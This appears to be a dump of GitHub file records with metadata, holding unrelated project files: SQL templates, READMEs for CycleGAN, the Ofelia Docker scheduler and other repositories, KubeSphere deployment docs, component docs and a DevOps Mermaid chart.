] | null | null | null | src/main/resources/beetlsql/mysql/newslist.md | LiuAustin/ptg | 28b145074c70b6b3d2d7b3f1106c6b47f3c855e5 | [
"Apache-2.0"
] | null | null | null | src/main/resources/beetlsql/mysql/newslist.md | LiuAustin/ptg | 28b145074c70b6b3d2d7b3f1106c6b47f3c855e5 | [
"Apache-2.0"
] | null | null | null | list
===
SELECT
blade_newslist.*,bd.name,
cbu.name AS createUser,
ubu.name AS updateUser
FROM
blade_newslist
LEFT JOIN blade_user cbu ON blade_newslist.creater = cbu.id
LEFT JOIN blade_user ubu ON blade_newslist.updater = ubu.id
LEFT JOIN blade_dict bd ON blade_newslist.category=bd.num AND bd.code=108
listCategoryView
===
select d.name from blade_newslist t,blade_dict d where d.code=108
and d.num=t.category | 25.75 | 73 | 0.803398 | kor_Hang | 0.385129 |
6114b5e799804e20700b4a2edc31b2d097abc96f | 122 | md | Markdown | README.md | ShaonMajumder/Cylinder_Band | 19e957351f56e1d4854cec91983dffebf8434402 | [
"Apache-2.0"
] | 2 | 2018-07-23T09:48:58.000Z | 2018-07-23T09:53:05.000Z | README.md | ShaonMajumder/Cylinder_Band | 19e957351f56e1d4854cec91983dffebf8434402 | [
"Apache-2.0"
] | null | null | null | README.md | ShaonMajumder/Cylinder_Band | 19e957351f56e1d4854cec91983dffebf8434402 | [
"Apache-2.0"
] | null | null | null | # Cylinder_Band
## Download
For downloading use
`git clone https://github.com/ShaonMajumder/Cylinder_Band.git`
| 24.4 | 70 | 0.729508 | yue_Hant | 0.638744 |
6114ff385ec66f10f97117ef1f6409f22c3a7883 | 126 | md | Markdown | .github/PULL_REQUEST_TEMPLATE.md | azeezolaniran2016/todo-api | bd2d2c6e0afda373b9c3a607a72b2c0cf04b6075 | [
"MIT"
] | null | null | null | .github/PULL_REQUEST_TEMPLATE.md | azeezolaniran2016/todo-api | bd2d2c6e0afda373b9c3a607a72b2c0cf04b6075 | [
"MIT"
] | null | null | null | .github/PULL_REQUEST_TEMPLATE.md | azeezolaniran2016/todo-api | bd2d2c6e0afda373b9c3a607a72b2c0cf04b6075 | [
"MIT"
] | null | null | null | #### Relevant project management (Trello, Jira) story?
#### Documentations?
#### Test strategy?
#### Screenshots (if any)?
| 15.75 | 54 | 0.650794 | eng_Latn | 0.452816 |
611529fe017c404c5898229fde937567bba92be2 | 3,990 | md | Markdown | content/en/docs/project-user-guide/grayscale-release/blue-green-deployment.md | rockpanda/website | 4c88545f66e08a99194fa4d252542c7f55f9610b | [
"Apache-2.0"
] | null | null | null | content/en/docs/project-user-guide/grayscale-release/blue-green-deployment.md | rockpanda/website | 4c88545f66e08a99194fa4d252542c7f55f9610b | [
"Apache-2.0"
] | null | null | null | content/en/docs/project-user-guide/grayscale-release/blue-green-deployment.md | rockpanda/website | 4c88545f66e08a99194fa4d252542c7f55f9610b | [
"Apache-2.0"
] | null | null | null | ---
title: "Blue-green Deployment"
keywords: 'KubeSphere, Kubernetes, service mesh, istio, release, blue-green deployment'
description: 'Learn how to release a blue-green deployment in KubeSphere.'
linkTitle: "Blue-green Deployment"
weight: 10520
---
The blue-green release provides a zero downtime deployment, which means the new version can be deployed with the old one preserved. At any time, only one of the versions is active serving all the traffic, while the other one remains idle. If there is a problem with running, you can quickly roll back to the old version.

## Prerequisites
- You need to enable [KubeSphere Service Mesh](../../../pluggable-components/service-mesh/).
- You need to create a workspace, a project and an account (`project-regular`). The account must be invited to the project with the role of `operator`. For more information, see [Create Workspaces, Projects, Accounts and Roles](../../../quick-start/create-workspace-and-project/).
- You need to enable **Application Governance** and have an available app so that you can implement the blue-green deployment for it. The sample app used in this tutorial is Bookinfo. For more information, see [Deploy Bookinfo and Manage Traffic](../../../quick-start/deploy-bookinfo-to-k8s/).
## Create a Blue-green Deployment Job
1. Log in to KubeSphere as `project-regular` and navigate to **Grayscale Release**. Under **Categories**, click **Create Job** on the right of **Blue-green Deployment**.
2. Set a name for it and click **Next**.
3. On the **Grayscale Release Components** tab, select your app from the drop-down list and the Service for which you want to implement the blue-green deployment. If you also use the sample app Bookinfo, select **reviews** and click **Next**.
4. On the **Grayscale Release Version** tab, add another version (e.g `v2`) as shown in the image below and click **Next**:

{{< notice note >}}
The image version is `v2` in the screenshot.
{{</ notice >}}
5. On the **Policy Config** tab, to allow the app version `v2` to take over all the traffic, select **Take over all traffic** and click **Create**.
6. The blue-green deployment job created displays under the tab **Job Status**. Click it to view details.

7. Wait for a while and you can see all the traffic go to the version `v2`:

8. The new **Deployment** is created as well.

9. You can directly get the virtual service to identify the weight by executing the following command:
```bash
kubectl -n demo-project get virtualservice -o yaml
```
{{< notice note >}}
- When you execute the command above, replace `demo-project` with your own project (i.e. namespace) name.
- If you want to execute the command from the web kubectl on the KubeSphere console, you need to use the account `admin`.
{{</ notice >}}
10. Expected output:
```yaml
...
spec:
hosts:
- reviews
http:
- route:
- destination:
host: reviews
port:
number: 9080
subset: v2
weight: 100
...
```
## Take a Job Offline
After you implement the blue-green deployment, and the result meets your expectation, you can take the task offline with the version `v1` removed by clicking **Job offline**.

| 44.333333 | 320 | 0.711278 | eng_Latn | 0.98855 |
61154db736305fb732eae2072ae4758d139ae23d | 221 | md | Markdown | _includes/p/135/1353B.md | akoprow/codeforces-editorials | 09e14544afb027c7ce926630ed31a7bc18ce54b2 | [
"CC0-1.0"
] | null | null | null | _includes/p/135/1353B.md | akoprow/codeforces-editorials | 09e14544afb027c7ce926630ed31a7bc18ce54b2 | [
"CC0-1.0"
] | null | null | null | _includes/p/135/1353B.md | akoprow/codeforces-editorials | 09e14544afb027c7ce926630ed31a7bc18ce54b2 | [
"CC0-1.0"
] | null | null | null | Fairly simple take: $$n-k$$ largest elements from $$a$$ and $$k$$ largest elements from union of $$k$$ largest elements of $$b$$ and remaining elements from $$a$$ (we can either keep them or swap for largest from $$b$$).
| 110.5 | 220 | 0.687783 | eng_Latn | 0.999678 |
6115e3fb49bbb58e56f82f330b7fd7766cfd7485 | 263 | md | Markdown | README.md | blacxcode/eBIOT-System | f16953ac132b92ee18cc64751641c814c58475dc | [
"Apache-2.0"
] | null | null | null | README.md | blacxcode/eBIOT-System | f16953ac132b92ee18cc64751641c814c58475dc | [
"Apache-2.0"
] | null | null | null | README.md | blacxcode/eBIOT-System | f16953ac132b92ee18cc64751641c814c58475dc | [
"Apache-2.0"
] | null | null | null | # eBIOT-System
eBIOT System is an electronic device designed to assist in alerting somebody in emergency situations where a threat to persons or property exists. These devices also equipped with access control system (ACS) to activating other electronic devices.
| 87.666667 | 247 | 0.828897 | eng_Latn | 0.999821 |
61161e5e4717013d6d3fa5375edd9f9b066dfd64 | 144 | md | Markdown | translations/zh-CN/data/reusables/enterprise_site_admin_settings/repository-search.md | Hardik-Ghori/docs | a1910a7f8cedd4485962ad0f0c3c93d7348709a5 | [
"CC-BY-4.0",
"MIT"
] | 20 | 2021-02-17T16:18:11.000Z | 2022-03-16T08:30:36.000Z | translations/zh-CN/data/reusables/enterprise_site_admin_settings/repository-search.md | 0954011723/docs | d51685810027d8071e54237bbfd1a9fb7971941d | [
"CC-BY-4.0",
"MIT"
] | 40 | 2020-10-21T12:54:07.000Z | 2021-07-23T06:10:46.000Z | translations/zh-CN/data/reusables/enterprise_site_admin_settings/repository-search.md | 0954011723/docs | d51685810027d8071e54237bbfd1a9fb7971941d | [
"CC-BY-4.0",
"MIT"
] | 3 | 2021-03-31T18:21:34.000Z | 2021-04-10T21:07:53.000Z | 1. 在搜索字段中,输入仓库的名称,然后单击 **Search(搜索)**。 
| 72 | 143 | 0.770833 | kor_Hang | 0.286205 |
6117226fc6ca3ff50cd838a1aa6db9737d084448 | 62 | md | Markdown | README.md | rukiy/RStandardFramework | 71f3022e8ede68989821286d3ddbbcad0f31606b | [
"Apache-2.0"
] | null | null | null | README.md | rukiy/RStandardFramework | 71f3022e8ede68989821286d3ddbbcad0f31606b | [
"Apache-2.0"
] | null | null | null | README.md | rukiy/RStandardFramework | 71f3022e8ede68989821286d3ddbbcad0f31606b | [
"Apache-2.0"
] | null | null | null | # RStandardFramework
Rukiy Standard Framework
SpringBoot 2.X | 15.5 | 24 | 0.83871 | kor_Hang | 0.632142 |
61172571fdf5042fc411e3e2022350403acaa09f | 2,140 | md | Markdown | docs/deployment/how-to-enable-autostart-for-cd-installations.md | mairaw/visualstudio-docs.pt-br | 26480481c1cdab3e77218755148d09daec1b3454 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/deployment/how-to-enable-autostart-for-cd-installations.md | mairaw/visualstudio-docs.pt-br | 26480481c1cdab3e77218755148d09daec1b3454 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/deployment/how-to-enable-autostart-for-cd-installations.md | mairaw/visualstudio-docs.pt-br | 26480481c1cdab3e77218755148d09daec1b3454 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-07-26T14:58:39.000Z | 2021-07-26T14:58:39.000Z | ---
title: 'Como: habilitar o AutoStart para instalações por CD | Microsoft Docs'
ms.custom: ''
ms.date: 11/04/2016
ms.technology: vs-ide-deployment
ms.topic: conceptual
dev_langs:
- VB
- CSharp
- C++
helpviewer_keywords:
- ClickOnce deployment, AutoStart
- ClickOnce deployment, installation on CD or DVD
- deploying applications [ClickOnce], installation on CD or DVD
ms.assetid: caaec619-900c-4790-90e3-8c91f5347635
author: mikejo5000
ms.author: mikejo
manager: douge
ms.workload:
- multiple
ms.openlocfilehash: 97642a499e0415dd6fcd245e379c9f01520b5c53
ms.sourcegitcommit: 0e5289414d90a314ca0d560c0c3fe9c88cb2217c
ms.translationtype: MT
ms.contentlocale: pt-BR
ms.lasthandoff: 07/19/2018
ms.locfileid: "39151240"
---
# <a name="how-to-enable-autostart-for-cd-installations"></a>Como: habilitar o AutoStart para instalações por CD
Ao implantar uma [!INCLUDE[ndptecclick](../deployment/includes/ndptecclick_md.md)] aplicativo por meio de uma mídia removível, como CD-ROM ou DVD-ROM, você pode habilitar `AutoStart` para que o [!INCLUDE[ndptecclick](../deployment/includes/ndptecclick_md.md)] aplicativo seja iniciado automaticamente quando a mídia for inserida.
`AutoStart` pode ser habilitada na **Publish** página do **Designer de projeto**.
### <a name="to-enable-autostart"></a>Para habilitar o AutoStart
1. Com um projeto selecionado no **Gerenciador de soluções**diante a **Project** menu, clique em **propriedades**.
2. Clique o **publicar** guia.
3. Clique o **opções** botão.
O **opções de publicação** caixa de diálogo é exibida.
4. Clique em **implantação**.
5. Selecione o **instalações para CD, iniciar automaticamente a instalação quando o CD é inserido** caixa de seleção.
Uma *Autorun* arquivo será copiado para o local de publicação quando o aplicativo é publicado.
## <a name="see-also"></a>Consulte também
[Publicar aplicativos ClickOnce](../deployment/publishing-clickonce-applications.md)
[Como: publicar um aplicativo ClickOnce usando o Assistente de publicação](../deployment/how-to-publish-a-clickonce-application-using-the-publish-wizard.md) | 41.960784 | 331 | 0.754673 | por_Latn | 0.944155 |
6117fc43a5a00a0830c63372be21075e5e79be72 | 4,446 | md | Markdown | README.md | MHC-CycleGAN-Research/cyclegan-1 | 4c875b5a575d22c5925216285222ffe2c34cf788 | [
"MIT"
] | null | null | null | README.md | MHC-CycleGAN-Research/cyclegan-1 | 4c875b5a575d22c5925216285222ffe2c34cf788 | [
"MIT"
] | null | null | null | README.md | MHC-CycleGAN-Research/cyclegan-1 | 4c875b5a575d22c5925216285222ffe2c34cf788 | [
"MIT"
] | null | null | null | # CycleGAN in TensorFlow
**[update 9/26/2017]** We observed faster convergence and better performance after adding skip connection between input and output in the generator. To turn the feature on, use switch --skip=True. This is the result of turning on skip after training for 23 epochs:
<img src='imgs/skip_result.jpg' width="900px"/>
This is the TensorFlow implementation for CycleGAN. The code was written by [Harry Yang](https://www.harryyang.org) and [Nathan Silberman](https://github.com/nathansilberman).
CycleGAN: [[Project]](https://junyanz.github.io/CycleGAN/) [[Paper]](https://arxiv.org/pdf/1703.10593.pdf)
## Introduction
This code contains two versions of the network architectures and hyper-parameters. The first one is based on the [TensorFlow implementation](https://github.com/hardikbansal/CycleGAN). The second one is based on the [official PyTorch implementation](https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix). The differences are minor and we observed both versions produced good results. You may need to train several times as the quality of the results are sensitive to the initialization.
Below is a snapshot of our result at the 50th epoch on one training instance:
<img src='imgs/horse2zebra.png' width="900px"/>
## Getting Started
### Prepare dataset
* You can either download one of the defaults CycleGAN datasets or use your own dataset.
* Download a CycleGAN dataset (e.g. horse2zebra):
```bash
bash ./download_datasets.sh horse2zebra
```
* Use your own dataset: put images from each domain at folder_a and folder_b respectively.
* Create the csv file as input to the data loader.
* Edit the cyclegan_datasets.py file. For example, if you have a face2ramen_train dataset which contains 800 face images and 1000 ramen images both in PNG format, you can just edit the cyclegan_datasets.py as following:
```python
DATASET_TO_SIZES = {
'face2ramen_train': 1000
}
PATH_TO_CSV = {
'face2ramen_train': './CycleGAN/input/face2ramen/face2ramen_train.csv'
}
DATASET_TO_IMAGETYPE = {
'face2ramen_train': '.png'
}
```
* Run create_cyclegan_dataset.py:
```bash
python -m CycleGAN_TensorFlow.create_cyclegan_dataset --image_path_a=folder_a --image_path_b=folder_b --dataset_name="horse2zebra_train" --do_shuffle=0
```
### Training
* Create the configuration file. The configuration file contains basic information for training/testing. An example of the configuration file could be fond at configs/exp_01.json.
* Start training:
```bash
python -m CycleGAN_TensorFlow.main \
--to_train=1 \
--log_dir=CycleGAN_TensorFlow/output/cyclegan/exp_01 \
--config_filename=CycleGAN_TensorFlow/configs/exp_01.json
```
* Check the intermediate results.
* Tensorboard
```bash
tensorboard --port=6006 --logdir=CycleGAN_TensorFlow/output/cyclegan/exp_01/#timestamp#
```
* Check the html visualization at CycleGAN_TensorFlow/output/cyclegan/exp_01/#timestamp#/epoch_#id#.html.
### Restoring from the previous checkpoint.
```bash
python -m CycleGAN_TensorFlow.main \
--to_train=2 \
--log_dir=CycleGAN_TensorFlow/output/cyclegan/exp_01 \
--config_filename=CycleGAN_TensorFlow/configs/exp_01.json \
--checkpoint_dir=CycleGAN_TensorFlow/output/cyclegan/exp_01/#timestamp#
```
### Testing
* Create the testing dataset.
* Edit the cyclegan_datasets.py file the same way as training.
* Create the csv file as the input to the data loader.
```bash
python -m CycleGAN_TensorFlow.create_cyclegan_dataset --image_path_a=folder_a --image_path_b=folder_b --dataset_name="horse2zebra_test" --do_shuffle=0
```
* Run testing.
```bash
python -m CycleGAN_TensorFlow.main \
--to_train=0 \
--log_dir=CycleGAN_TensorFlow/output/cyclegan/exp_01 \
--config_filename=CycleGAN_TensorFlow/configs/exp_01_test.json \
--checkpoint_dir=CycleGAN_TensorFlow/output/cyclegan/exp_01/#old_timestamp#
```
The result is saved in CycleGAN_TensorFlow/output/cyclegan/exp_01/#new_timestamp#.
## What I did to run it: (in the home directory)
0. download dataset zip file and extract it in input folder in cyclegan-1
1. create dataset using this command (it generates csv file):
```bash
python -m cyclegan-1.create_cyclegan_dataset --dataset_name="horse2zebra_train" --do_shuffle=0
```
2. train the network
```bash
python -m cyclegan-1.main --to_train=1 --log_dir=./cyclegan-1/output/cyclegan/exp_01 --config_filename=./cyclegan-1/configs/exp_01.json
```
| 41.551402 | 490 | 0.765182 | eng_Latn | 0.890939 |
6119b8b49c901c45cc5570d4025abbe3fc7fe11f | 1,026 | md | Markdown | src/packages/gesture/doc.md | afc163/nutui | c5c6a3fd02b22003b8005df980ae292169f433e3 | [
"MIT"
] | 1 | 2020-12-31T01:31:07.000Z | 2020-12-31T01:31:07.000Z | src/packages/gesture/doc.md | afc163/nutui | c5c6a3fd02b22003b8005df980ae292169f433e3 | [
"MIT"
] | null | null | null | src/packages/gesture/doc.md | afc163/nutui | c5c6a3fd02b22003b8005df980ae292169f433e3 | [
"MIT"
] | null | null | null | # Gesture 手势组件
基于[hammer.js](http://hammerjs.github.io/getting-started/)封装,支持移动端各种手势操作。包括'tap', 'pan', 'pinch', 'press', 'rotate', 'swipe'
## 基本用法
```html
<div class="item" v-gesture:pan="test1" v-gesture:panend="test2" :style="{ left: left, top: top }">
平移
</div>
```
## 指定方向平移
```html
<div class="item" v-gesture:pan.left="test3">
左移
</div>
```
## 指定方向滑动
```html
<div class="item" v-gesture:swipe.horizontal="test3">
swipe
</div>
```
## 绑定多个事件
```html
<div class="item" v-gesture:press="test3" v-gesture:tap="test3" v-gesture:pan="test3">
press、tap、pan
</div>
<script>
export default {
data() {
return {
left: 0,
top: 70,
posX: 0,
posY: 70
};
},
mounted() {},
methods: {
test1(e) {
this.left = parseInt(this.posX) + e.deltaX + 'px';
this.top = parseInt(this.posY) + e.deltaY + 'px';
},
test2(e) {
this.posX = this.left;
this.posY = this.top;
},
test3(e) {
console.log(e.deltaX, e.deltaY);
}
}
};
</script>
```
| 18.654545 | 123 | 0.560429 | kor_Hang | 0.112609 |
611a2715a9ddf02e24b013254af3ef1c61a7ca8b | 6,300 | md | Markdown | README.md | vigasin/ofelia | 20df97afeee3efa5ffca68913e2b43c1d5b3e23a | [
"MIT"
] | null | null | null | README.md | vigasin/ofelia | 20df97afeee3efa5ffca68913e2b43c1d5b3e23a | [
"MIT"
] | null | null | null | README.md | vigasin/ofelia | 20df97afeee3efa5ffca68913e2b43c1d5b3e23a | [
"MIT"
] | null | null | null | # Ofelia - a job scheduler [](https://github.com/vigasin/ofelia/releases) [](http://codecov.io/github/vigasin/ofelia?branch=master) [](https://travis-ci.org/vigasin/ofelia)
<img src="https://weirdspace.dk/FranciscoIbanez/Graphics/Ofelia.gif" align="right" width="180px" height="300px" vspace="20" />
**Ofelia** is a modern and low footprint job scheduler for __docker__ environments, built on Go. Ofelia aims to be a replacement for the old fashioned [cron](https://en.wikipedia.org/wiki/Cron).
### Why?
It has been a long time since [`cron`](https://en.wikipedia.org/wiki/Cron) was released, actually more than 28 years. The world has changed a lot and especially since the `Docker` revolution. **Vixie's cron** works great but it's not extensible and it's hard to debug when something goes wrong.
Many solutions are available: ready to go containerized `crons`, wrappers for your commands, etc. but in the end simple tasks become complex.
### How?
The main feature of **Ofelia** is the ability to execute commands directly on Docker containers. Using Docker's API Ofelia emulates the behavior of [`exec`](https://docs.docker.com/reference/commandline/exec/), being able to run a command inside of a running container. Also you can run the command in a new container destroying it at the end of the execution.
## Configuration
### Jobs
[Scheduling format](https://godoc.org/github.com/robfig/cron) is the same as the Go implementation of `cron`. E.g. `@every 10s` or `0 0 1 * * *` (every night at 1 AM).
**Note**: the format starts with seconds, instead of minutes.
you can configure four different kind of jobs:
- `job-exec`: this job is executed inside of a running container.
- `job-run`: runs a command inside of a new container, using a specific image.
- `job-local`: runs the command inside of the host running ofelia.
- `job-service-run`: runs the command inside a new "run-once" service, for running inside a swarm
See [Jobs reference documentation](docs/jobs.md) for all available parameters.
#### INI-style config
Run with `ofelia daemon --config=/path/to/config.ini`
```ini
[job-exec "job-executed-on-running-container"]
schedule = @hourly
container = my-container
command = touch /tmp/example
[job-run "job-executed-on-new-container"]
schedule = @hourly
image = ubuntu:latest
command = touch /tmp/example
[job-local "job-executed-on-current-host"]
schedule = @hourly
command = touch /tmp/example
[job-service-run "service-executed-on-new-container"]
schedule = 0,20,40 * * * *
image = ubuntu
network = swarm_network
command = touch /tmp/example
```
#### Docker labels configurations
In order to use this type of configurations, ofelia need access to docker socket.
```sh
docker run -it --rm \
-v /var/run/docker.sock:/var/run/docker.sock:ro \
--label ofelia.job-local.my-test-job.schedule="@every 5s" \
--label ofelia.job-local.my-test-job.command="date" \
mcuadros/ofelia:latest daemon --docker
```
Labels format: `ofelia.<JOB_TYPE>.<JOB_NAME>.<JOB_PARAMETER>=<PARAMETER_VALUE>.
This type of configuration supports all the capabilities provided by INI files.
Also, it is possible to configure `job-exec` by setting labels configurations on the target container. To do that, additional label `ofelia.enabled=true` need to be present on the target container.
For example, we want `ofelia` to execute `uname -a` command in the existing container called `my_nginx`.
To do that, we need to we need to start `my_nginx` container with next configurations:
```sh
docker run -it --rm \
--label ofelia.enabled=true \
--label ofelia.job-exec.test-exec-job.schedule="@every 5s" \
--label ofelia.job-exec.test-exec-job.command="uname -a" \
nginx
```
Now if we start `ofelia` container with the command provided above, it will pickup 2 jobs:
- Local - `date`
- Exec - `uname -a`
Or with docker-compose:
```yaml
version: "3"
services:
ofelia:
image: mcuadros/ofelia:latest
depends_on:
- nginx
command: daemon --docker
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
labels:
ofelia.job-local.my-test-job.schedule: "@every 5s"
ofelia.job-local.my-test-job.command: "date"
nginx:
image: nginx
labels:
ofelia.enabled: "true"
ofelia.job-exec.datecron.schedule: "@every 5s"
ofelia.job-exec.datecron.command: "uname -a"
```
### Logging
**Ofelia** comes with three different logging drivers that can be configured in the `[global]` section:
- `mail` to send mails
- `save` to save structured execution reports to a directory
- `slack` to send messages via a slack webhook
#### Options
- `smtp-host` - address of the SMTP server.
- `smtp-port` - port number of the SMTP server.
- `smtp-user` - user name used to connect to the SMTP server.
- `smtp-password` - password used to connect to the SMTP server.
- `email-to` - mail address of the receiver of the mail.
- `email-from` - mail address of the sender of the mail.
- `mail-only-on-error` - only send a mail if the execution was not successful.
- `save-folder` - directory in which the reports shall be written.
- `save-only-on-error` - only save a report if the execution was not successful.
- `slack-webhook` - URL of the slack webhook.
- `slack-only-on-error` - only send a slack message if the execution was not successful.
### Overlap
**Ofelia** can prevent that a job is run twice in parallel (e.g. if the first execution didn't complete before a second execution was scheduled. If a job has the option `no-overlap` set, it will not be run concurrently.
## Installation
The easiest way to deploy **ofelia** is using *Docker*.
```sh
docker run -it -v /etc/ofelia:/etc/ofelia vigasin/ofelia:latest
```
Don't forget to place your `config.ini` at your host machine.
If don't want to run **ofelia** using our *Docker* image you can download a binary from [releases](https://github.com/vigasin/ofelia/releases) page.
> Why the project is named Ofelia? Ofelia is the name of the office assistant from the Spanish comic [Mortadelo y Filemón](https://en.wikipedia.org/wiki/Mort_%26_Phil)
| 40.645161 | 375 | 0.726667 | eng_Latn | 0.969903 |
611b54d3835406452916a8d5ea2d3f4e91074cfb | 455 | md | Markdown | docs/OutputStatusResponse.md | lab5e/java-spanapi | 731c09ca5b2c49425c0883ea6c58cca1cc96ca90 | [
"BSD-2-Clause"
] | null | null | null | docs/OutputStatusResponse.md | lab5e/java-spanapi | 731c09ca5b2c49425c0883ea6c58cca1cc96ca90 | [
"BSD-2-Clause"
] | null | null | null | docs/OutputStatusResponse.md | lab5e/java-spanapi | 731c09ca5b2c49425c0883ea6c58cca1cc96ca90 | [
"BSD-2-Clause"
] | null | null | null |
# OutputStatusResponse
## Properties
Name | Type | Description | Notes
------------ | ------------- | ------------- | -------------
**collectionId** | **String** | | [optional]
**outputId** | **String** | | [optional]
**enabled** | **Boolean** | | [optional]
**errorCount** | **Integer** | | [optional]
**forwarded** | **Integer** | | [optional]
**received** | **Integer** | | [optional]
**retransmits** | **Integer** | | [optional]
| 22.75 | 60 | 0.487912 | kor_Hang | 0.132359 |
611b90605a28431e924b81150f19c1f21e3417d4 | 763 | md | Markdown | README.md | lucaswadedavis/enumero | 952578f00da5ed748d371d1ef3872985bd5708d0 | [
"MIT"
] | null | null | null | README.md | lucaswadedavis/enumero | 952578f00da5ed748d371d1ef3872985bd5708d0 | [
"MIT"
] | null | null | null | README.md | lucaswadedavis/enumero | 952578f00da5ed748d371d1ef3872985bd5708d0 | [
"MIT"
] | null | null | null | ###Enumero is a tool for counting tokens (usually words).
- I've used it to count phrases in foreign languages (so I'd know what to learn to translate first)
- and political essays (quick way to tag articles)
- and jQuery (though it could be done with any codebase you like, to figure out the common patterns for building transpilation targets).
- (a string) the sample to be deconstructed and counted
- (an int, default 1) the chunk size
- (a boolean, default false) whether to split on spaces or between every character
The method will return an object where the keys are the counted bits and values are the counts.
Of course if you just want the whole GUI (which is what I use most), just clone the whole thing and open the index.html file in a browser.
| 50.866667 | 138 | 0.764089 | eng_Latn | 0.999922 |
611be945836cfe9c946143830adedd50698273a3 | 1,043 | md | Markdown | content/bio/stephan-kinsella.md | gy741/lbry.io | cb1d82707e24be2f5b6700fef2b951b07ad00686 | [
"MIT"
] | null | null | null | content/bio/stephan-kinsella.md | gy741/lbry.io | cb1d82707e24be2f5b6700fef2b951b07ad00686 | [
"MIT"
] | null | null | null | content/bio/stephan-kinsella.md | gy741/lbry.io | cb1d82707e24be2f5b6700fef2b951b07ad00686 | [
"MIT"
] | 1 | 2021-03-31T04:01:59.000Z | 2021-03-31T04:01:59.000Z | ---
name: Stephan Kinsella
role: Legal Advisor
---
Stephan Kinsella is a registered patent attorney and has over twenty years’ experience in patent, intellectual property, and general commercial and corporate law. He is the founder and director of the [Center for the Study of Innovative Freedom](http://c4sif.org/). Kinsella has published numerous articles and books on intellectual property law and legal topics including [_International Investment, Political Risk, and Dispute Resolution: A Practitioner’s Guide_](http://www.amazon.com/International-Investment-Political-Dispute-Resolution/dp/0379215225) and [_Against Intellectual Property_](https://mises.org/library/against-intellectual-property-0) .
He received an LL.M. in international business law from [King’s College London](http://www.kcl.ac.uk/), a JD from the Paul M. Hebert Law Center at [Louisiana State University](//lsu.edu), as well as BSEE and MSEE degrees. His websites are [stephankinsella.com](http://stephankinsella.com) and [kinsellalaw.com](http://kinsellalaw.com)
| 130.375 | 655 | 0.794823 | eng_Latn | 0.969168 |
611bfc427057ed70b17f2988a59f3bdae0738a83 | 3,928 | md | Markdown | mermaid-devops-map.md | Sam-Rowe/DevOps-Map | 0373d67da7c8a099608ec62c81f59d3752a7eabd | [
"MIT"
] | 2 | 2020-12-29T14:00:33.000Z | 2021-01-06T17:34:52.000Z | mermaid-devops-map.md | Sam-Rowe/DevOps-Map | 0373d67da7c8a099608ec62c81f59d3752a7eabd | [
"MIT"
] | 4 | 2021-01-03T16:01:35.000Z | 2021-03-13T14:33:31.000Z | mermaid-devops-map.md | Sam-Rowe/DevOps-Map | 0373d67da7c8a099608ec62c81f59d3752a7eabd | [
"MIT"
] | null | null | null | flowchart TB
AgileWork(Agile Work)
AutomatedTesting(Automated Testing)
Blue/GreenDeployment(Blue/Green Deployment)
BranchingStrategy(Branching Strategy)
CanaryReleases(Canary Releases)
ChaosAgent(Chaos Agent)
CodeQualityScans(Code Quality Scans)
CodeQualityScans(Code Quality Scans)
ConfigDatabase/Git(Config Database/Git)
ContainerisedApplication(Containerised Application)
ContinuousDelivery(Continuous Delivery)
ContinuousDeployment(Continuous Deployment)
ContinuousIntegration(Continuous Integration)
CropsnotGardenplants(Crops not Garden plants)
DarkLaunching(Dark Launching)
ExploratoryTesting(Exploratory Testing)
FeatureToggles(Feature Toggles)
ImmutableArtefacts(Immutable Artefacts)
InfrastructureasCode(Infrastructure as Code)
MicroserviceEcosystem(Microservice Ecosystem)
ParametrisedInfrastructureasCode(Parametrised Infrastructure as Code)
ReleaseViews(Release Views)
RepositoryComposition(Repository Composition)
SecretsVault(Secrets Vault)
SemanticVersioning(Semantic Versioning)
SeparationofinternalversioningfromMarketingversioning(Separation of internal versioning from Marketing versioning)
TestDrivenDevelopment(Test Driven Development)
UnitTesting(Unit Testing)
AutomatedTesting <-. Better Together With .-> ExploratoryTesting
AutomatedTesting <-. Better Together With .-> CodeQualityScans
AutomatedTesting .-> | Reduces Failure Of | ContinuousIntegration
UnitTesting --> | Enables | ContinuousIntegration
CodeQualityScans <-. Better Together With .-> AgileWork
AgileWork .-> | Reduces Failure Of | TestDrivenDevelopment
AgileWork --> | Enables | BranchingStrategy
BranchingStrategy --> | Enables | RepositoryComposition
BranchingStrategy --> | Enables | ParametrisedInfrastructureasCode
BranchingStrategy .-> | Reduces Failure Of | ContinuousIntegration
BranchingStrategy .-> | Reduces Failure Of | InfrastructureasCode
InfrastructureasCode --> | Enables | ContinuousDelivery
InfrastructureasCode --> | Enables | ParametrisedInfrastructureasCode
InfrastructureasCode .-> | Reduces Failure Of | ContinuousDelivery
InfrastructureasCode .-> | Reduces Failure Of | ParametrisedInfrastructureasCode
DarkLaunching .-> | Reduces Failure Of | ContinuousDeployment
TestDrivenDevelopment .-> | Reduces Failure Of | UnitTesting
TestDrivenDevelopment .-> | Reduces Failure Of | AutomatedTesting
ContinuousIntegration --> | Enables | ContinuousDelivery
ContinuousIntegration --> | Enables | ImmutableArtefacts
SemanticVersioning --> | Enables | ReleaseViews
SemanticVersioning .-> | Reduces Failure Of | ImmutableArtefacts
ReleaseViews .-> | Reduces Failure Of | SemanticVersioning
ReleaseViews --> | Enables | SeparationofinternalversioningfromMarketingversioning
ImmutableArtefacts .-> | Reduces Failure Of | ContinuousIntegration
ImmutableArtefacts --> | Enables | SemanticVersioning
ContainerisedApplication .-> | Reduces Failure Of | ContinuousDeployment
ContinuousDelivery --> | Enables | ContinuousDeployment
ContinuousDelivery --> | Enables | ContainerisedApplication
SecretsVault <-. Better Together With .-> ContinuousDelivery
SecretsVault <-. Better Together With .-> ContinuousDeployment
ContinuousDeployment --> | Enables | DarkLaunching
ContinuousDeployment --> | Enables | CropsnotGardenplants
ContinuousDeployment --> | Enables | CanaryReleases
ContinuousDeployment --> | Enables | Blue/GreenDeployment
ContinuousDeployment --> | Enables | MicroserviceEcosystem
FeatureToggles .-> | Reduces Failure Of | MicroserviceEcosystem
FeatureToggles <-. Better Together With .-> ConfigDatabase/Git
ChaosAgent .-> | Reduces Failure Of | ContinuousDeployment
CropsnotGardenplants .-> | Reduces Failure Of | ContinuousDeployment
| 55.323944 | 118 | 0.770367 | yue_Hant | 0.310287 |
611c22d44e8a2741405c38bcd07771e40c0ab251 | 1,675 | md | Markdown | AlchemyInsights/outlook-com-missing-folders.md | isabella232/OfficeDocs-AlchemyInsights-pr.fr-FR | b23fe97cbba1674ad1f59978ca5080bb00d217cb | [
"CC-BY-4.0",
"MIT"
